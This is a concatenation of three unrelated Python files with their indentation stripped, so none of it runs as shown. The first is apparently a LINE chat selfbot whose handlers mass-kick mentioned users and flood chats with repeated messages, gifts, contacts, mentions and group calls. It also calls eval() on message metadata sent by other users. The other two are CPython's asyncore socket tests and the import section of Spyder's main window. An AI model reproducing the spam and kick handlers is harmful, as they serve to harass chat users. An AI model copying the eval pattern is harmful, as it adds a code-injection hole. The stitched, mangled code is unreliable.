def getGroupWithoutMembers(self, groupId):
return self.talk.getGroupWithoutMembers(groupId)
@loggedIn
def findGroupByTicket(self, ticketId):
return self.talk.findGroupByTicket(ticketId)
@loggedIn
def acceptGroupInvitation(self, groupId):
return self.talk.acceptGroupInvitation(0, groupId)
@loggedIn
def acceptGroupInvitationByTicket(self, groupId, ticketId):
return self.talk.acceptGroupInvitationByTicket(0, groupId, ticketId)
@loggedIn
def cancelGroupInvitation(self, groupId, contactIds):
return self.talk.cancelGroupInvitation(0, groupId, contactIds)
@loggedIn
def createGroup(self, name, midlist):
return self.talk.createGroup(0, name, midlist)
@loggedIn
def getGroup(self, groupId):
return self.talk.getGroup(groupId)
@loggedIn
def getGroups(self, groupIds):
return self.talk.getGroups(groupIds)
@loggedIn
def getGroupsV2(self, groupIds):
return self.talk.getGroupsV2(groupIds)
@loggedIn
def getCompactGroup(self, groupId):
return self.talk.getCompactGroup(groupId)
@loggedIn
def getCompactRoom(self, roomId):
return self.talk.getCompactRoom(roomId)
@loggedIn
def getGroupIdsByName(self, groupName):
gIds = []
for gId in self.getGroupIdsJoined():
g = self.getCompactGroup(gId)
if groupName in g.name:
gIds.append(gId)
return gIds
@loggedIn
def getGroupIdsInvited(self):
return self.talk.getGroupIdsInvited()
@loggedIn
def getGroupIdsJoined(self):
return self.talk.getGroupIdsJoined()
@loggedIn
def updateGroupPreferenceAttribute(self, groupMid, updatedAttrs):
return self.talk.updateGroupPreferenceAttribute(0, groupMid, updatedAttrs)
@loggedIn
def inviteIntoGroup(self, groupId, midlist):
return self.talk.inviteIntoGroup(0, groupId, midlist)
@loggedIn
def kickoutFromGroup(self, groupId, midlist):
return self.talk.kickoutFromGroup(0, groupId, midlist)
@loggedIn
def leaveGroup(self, groupId):
return self.talk.leaveGroup(0, groupId)
@loggedIn
def rejectGroupInvitation(self, groupId):
return self.talk.rejectGroupInvitation(0, groupId)
@loggedIn
def reissueGroupTicket(self, groupId):
return self.talk.reissueGroupTicket(groupId)
@loggedIn
def updateGroup(self, groupObject):
return self.talk.updateGroup(0, groupObject)
"""Room"""
@loggedIn
def createRoom(self, midlist):
return self.talk.createRoom(0, midlist)
@loggedIn
def getRoom(self, roomId):
return self.talk.getRoom(roomId)
@loggedIn
def inviteIntoRoom(self, roomId, midlist):
return self.talk.inviteIntoRoom(0, roomId, midlist)
@loggedIn
def leaveRoom(self, roomId):
return self.talk.leaveRoom(0, roomId)
@loggedIn
def kusumu(self,msg):
self.sendMessage(msg.to,'Logout From Device')
self.logout()
"""Call"""
@loggedIn
def acquireCallTalkRoute(self, to):
return self.talk.acquireCallRoute(to)
"""Liff"""
@loggedIn
def issueLiffView(self, request):
return self.liff.issueLiffView(request)
@loggedIn
def revokeToken(self, request):
return self.liff.revokeToken(request)
"""Report"""
@loggedIn
def reportSpam(self, chatMid, memberMids=[], spammerReasons=[], senderMids=[], spamMessageIds=[], spamMessages=[]):
return self.talk.reportSpam(chatMid, memberMids, spammerReasons, senderMids, spamMessageIds, spamMessages)
@loggedIn
def reportSpammer(self, spammerMid, spammerReasons=[], spamMessageIds=[]):
return self.talk.reportSpammer(spammerMid, spammerReasons, spamMessageIds)
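# Strips the configured command prefix (wait['setkey']) from incoming text; returns '' when a prefix is set but not matched, or the raw text when no prefix is configured.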
def mycmd(self,text,wait):
cmd = ''
pesan = text.lower()
if wait['setkey'] != '':
if pesan.startswith(wait['setkey']):
cmd = pesan.replace(wait['setkey']+' ','').replace(wait['setkey'],'')
else:
cmd = text
return cmd
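# Drops the first one, two, or three space-separated words from text, depending on lp ('' / 's' / anything else).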
def adityasplittext(self,text,lp=''):
separate = text.split(" ")
if lp == '':adalah = text.replace(separate[0]+" ","")
elif lp == 's':adalah = text.replace(separate[0]+" "+separate[1]+" ","")
else:adalah = text.replace(separate[0]+" "+separate[1]+" "+separate[2]+" ","")
return adalah
def AdityaKicks(self,msg):
if 'MENTION' in msg.contentMetadata:
    targets = []
    key = eval(msg.contentMetadata["MENTION"])
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
self.kickoutFromGroup(msg.to,[target])
except Exception as e:
self.sendMessage(msg.to,str(e))
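# Spam/unsend command dispatcher: parses the repeat count from the command and loops the chosen send (message, gift, contact, mention or group call).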
def AdityaSpam(self,wait,msg):
to = msg.to
lontong = msg.text
msg.text = self.mycmd(msg.text,wait)
ditcmd = msg.text.lower()
if ditcmd.startswith('spam 1 '):j = int(msg.text.split(' ')[2])
if ditcmd.startswith('unsend '):j = int(msg.text.split(' ')[1])
if ditcmd.startswith('spam 2 '):j = int(msg.text.split(' ')[2])
if ditcmd.startswith('spam 3 '):j = int(msg.text.split(' ')[2])
if ditcmd.startswith('spam 4 '):j = int(msg.text.split(' ')[2])
if ditcmd.startswith('spam 5 '):j = int(msg.text.split(' ')[2])
if ditcmd.startswith('gcall '):j = int(msg.text.split(' ')[1])
a = [self.adityasplittext(msg.text,'s').replace('{} '.format(j),'')]*j
if 'MENTION' in msg.contentMetadata:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
nama = [key1]
if ditcmd.startswith('spam 3 '):b = [self.sendContact(to,key1) for b in a];self.sendMention(to, '「 Spam 」\n@!has been spammed with {} amount of contact♪'.format(j),'',[key1])
if ditcmd.startswith('spam 4 '):
if lontong.lower().startswith(wait['setkey']+" "):gss = 7 + len(wait['setkey'])+1
else:gss = 7 + len(wait['setkey'])
msg.contentMetadata = {'AGENT_LINK': 'line://ti/p/~{}'.format(self.getProfile().userid),'AGENT_ICON': "http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,'AGENT_NAME': ' 「 SPAM MENTION 」','MENTION': str('{"MENTIONEES":' + json.dumps([{'S':str(int(key['S'])-gss-len(msg.text.split(' ')[2])-1+13), 'E':str(int(key['E'])-gss-len(msg.text.split(' ')[2])-1+13), 'M':key['M']} for key in eval(msg.contentMetadata["MENTION"])["MENTIONEES"]]) + '}')}
msg.text = lontong[gss+1+len(msg.text.split(' ')[2]):].replace(lontong[gss+1+len(msg.text.split(' ')[2]):],' 「 Mention 」\n{}'.format(lontong[gss+1+len(msg.text.split(' ')[2]):]))
b = [self.sendMessages(msg) for b in a]
if ditcmd.startswith('spam 2 '):[self.giftmessage(key1) for b in a];self.sendMention(to, '「 Spam 」\n@!has been spammed with {} amount of gift♪'.format(j),'',[key1])
if ditcmd.startswith('gcall '):b = [self.call.inviteIntoGroupCall(to,nama,mediaType=2) for b in a];self.sendMention(to, '「 Gcall 」\n@!has been spammed with {} amount of call♪'.format(j),'',[key1])
else:
if ditcmd.startswith('gcall '):
group = self.getGroup(to);nama = [contact.mid for contact in group.members];b = [self.call.inviteIntoGroupCall(to,nama,mediaType=2) for b in a]
self.sendMention(to, ' 「 Gcall 」\n@!spammed with {} amount of call to all member♪'.format(j),'',[msg._from])
if ditcmd.startswith('spam 3 '):
try:group = self.getGroup(to);nama = [contact.mid for contact in group.members];b = [self.sendContact(to,random.choice(nama)) for b in a]
except:nama = [to,to];b = [self.sendContact(to,random.choice(nama)) for b in a]
if ditcmd.startswith('spam 2 '):b = [self.giftmessage(to) for b in a]
if ditcmd.startswith('spam 1 '):h = [self.sendMessage(to,b) for b in a];self.sendMessage(to, '「 Spam 」\nTarget has been spammed with {} amount of messages♪'.format(j))
if ditcmd.startswith('unsend '):
if len(msg.text.split(' ')) == 2:
h = wait['Unsend'][to]['B']
n = len(wait['Unsend'][to]['B'])
for b in h[:j]:
try:
self.unsendMessage(b)
wait['Unsend'][to]['B'].remove(b)
except:pass
t = len(wait['Unsend'][to]['B'])
self.sendMessage(to,"Successfully unsent {} messages".format((n-t)))
if len(msg.text.split(' ')) >= 3:h = [self.unsendMessage(self.sendMessage(to,self.adityasplittext(msg.text,'s')).id) for b in a]
test_asyncore.py
import asyncore
import unittest
import select
import os
import socket
import sys
import time
import errno
import struct
from test import support
from io import BytesIO
try:
import threading
except ImportError:
threading = None
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen()
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.time()
while n > 0 and time.time() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
support.unlink(addr)
sock.bind(addr)
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
with support.captured_stderr() as stderr:
d.log(l1)
d.log(l2)
lines = stderr.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
with support.captured_stdout() as stdout:
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
lines = stdout.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
with support.captured_stdout() as stdout:
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
lines = stdout.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event']
self.assertEqual(lines, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = support.bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((support.HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
t.join(timeout=TIMEOUT)
if t.is_alive():
self.fail("join() timed out")
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(support.TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
support.unlink(support.TESTFN)
def test_recv(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(support.TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
with support.check_warnings(('', ResourceWarning)):
f = None
support.gc_collect()
def test_close_twice(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
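# Base handler for the API tests below: every callback a given test does not
# expect to fire raises immediately, so stray events surface as test errors
# instead of being silently logged.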
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
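# Mixin holding the actual API tests. Concrete subclasses at the bottom of the
# file supply `family`, `addr` and `use_poll`, so the same tests run against
# IPv4, IPv6 and Unix sockets with both select() and poll().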
class BaseTestAPI:
def tearDown(self):
asyncore.close_all()
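# Drive the asyncore loop in short slices until `instance.flag` becomes true,
# failing the test if that does not happen within roughly `timeout` seconds.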
def loop_waiting_for_flag(self, instance, timeout=5):
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# handle_close() is only called after we make at least one
# recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll:
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
self.assertEqual(s.socket.family, self.family)
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(s.socket.type,
(sock_type | socket.SOCK_CLOEXEC, sock_type))
else:
self.assertEqual(s.socket.type, sock_type)
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(OSError, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
sock = socket.socket(self.family)
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
self.skipTest("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
finally:
sock.close()
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
if self.family in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
server = BaseServer(self.family, self.addr)
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=500))
t.start()
def cleanup():
t.join(timeout=TIMEOUT)
if t.is_alive():
self.fail("join() timed out")
self.addCleanup(cleanup)
s = socket.socket(self.family, socket.SOCK_STREAM)
s.settimeout(.2)
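# SO_LINGER with l_onoff=1 and l_linger=0 makes close() reset the
# connection instead of performing a graceful shutdown.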
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except OSError:
pass
finally:
s.close()
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (support.HOST, 0)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (support.HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = support.TESTFN
def tearDown(self):
support.unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
if __name__ == "__main__":
unittest.main()
mainwindow.py
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QKeySequence, QIcon
from qtpy.QtWidgets import (QApplication, QMainWindow, QMenu, QMessageBox,
QShortcut, QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) imports of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app.utils import (
create_application, create_splash_screen, create_window,
delete_debug_log_files, qt_message_handler, set_links_color, setup_logging,
set_opengl_implementation)
from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
from spyder.app.find_plugins import find_external_plugins, find_internal_plugins
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import (
Plugins, SpyderPlugin, SpyderPluginV2, SpyderDockablePlugin,
SpyderPluginWidget)
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
